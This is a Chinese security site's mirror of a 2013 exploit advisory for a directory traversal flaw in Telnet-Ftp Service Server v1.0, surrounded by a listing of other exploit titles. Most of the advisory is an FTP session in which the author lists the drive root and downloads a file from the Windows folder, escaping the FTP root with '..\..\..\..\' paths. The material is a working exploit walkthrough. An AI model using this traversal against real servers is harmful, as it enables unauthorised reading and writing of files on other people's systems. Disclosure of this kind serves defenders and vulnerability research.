首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Telnet-Ftp Service Server 1.0 Directory Traversal
来源:vfocus.net 作者:Chako 发布时间:2013-06-26  

# Exploit Title: Telnet-Ftp Service Server v1.0 Directory Traversal Vulnerability
# Date Published: 2013/6/18
# Exploit Author: Chako
# Software Link: http://telnet-ftp-server.en.softonic.com/
# Version: v1.0 (Build 1.218)
# Tested on: Windows Xp SP3 English
 

Description:
=====================
A vulnerability has been identified in Telnet-Ftp Service Server v1.0,
which allows attackers to read or write arbitrary files.
 

 

Exploit:
=====================
220 FTP Server ready. Telnet-Ftp Server v. 1.0 (Build 1.218)
User (127.0.0.1:(none)): chako
331 Password required for chako.
Password:
230 User chako logged in.
ftp> dir ..\..\..\..\
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Jun 12  2012 WINDOWS
drw-rw-rw-   1 ftp      ftp            0 Jun 12  2012 Documents and Settings
dr--r--r--   1 ftp      ftp            0 Jun 12  2012 Program Files
-rw-rw-rw-   1 ftp      ftp            0 Jun 12  2012 CONFIG.SYS
-rwxrwxrwx   1 ftp      ftp            0 Jun 12  2012 AUTOEXEC.BAT
drw-rw-rw-   1 ftp      ftp            0 Jun 12  2012 Python27
drw-rw-rw-   1 ftp      ftp            0 Jun 12  2012 Perl
drw-rw-rw-   1 ftp      ftp            0 Sep 07  2012 eb83393ec0d8ee1eab4b219f
drw-rw-rw-   1 ftp      ftp            0 Jun 08 10:55 Win32
drw-rw-rw-   1 ftp      ftp            0 Jun 08 12:46 tool
drw-rw-rw-   1 ftp      ftp            0 Jun 08 16:51 New Folder
drw-rw-rw-   1 ftp      ftp            0 Jun 08 23:22 TYPSoft FTP Server
-rw-rw-rw-   1 ftp      ftp            9 Jun 18 00:03 END
-rw-rw-rw-   1 ftp      ftp            0 Jun 18 00:04 Documents
226 File sent ok
ftp: 933 bytes received in 0.00Seconds 933000.00Kbytes/sec.
ftp> get ..\..\..\..\windows\hack.txt
200 Port command successful.
150 Opening data connection for ..\..\..\..\windows\hack.txt.
226 File sent ok
ftp: 14 bytes received in 0.00Seconds 14000.00Kbytes/sec.
ftp> !type hack.txt
Hello~ World!~ftp>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MoinMoin twikidraw Action Trav
·Sprite Software Android Race C
·Seowonintech Devices - Remote
·Baby FTP Server 1.24 - Denial
·AudioCoder 0.8.22 - Direct Ret
·ZPanel zsudo Local Privilege E
·PEiD 0.95 Memory Corruption
·Novell Client 2 SP3 nicm.sys L
·FreeBSD 9.0+ Privilege Escalat
·FreeBSD 9 Address Space Manipu
·Mozilla Firefox 21.0 Denial Of
·PHP Charts 1.0 Remote Code Exe
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved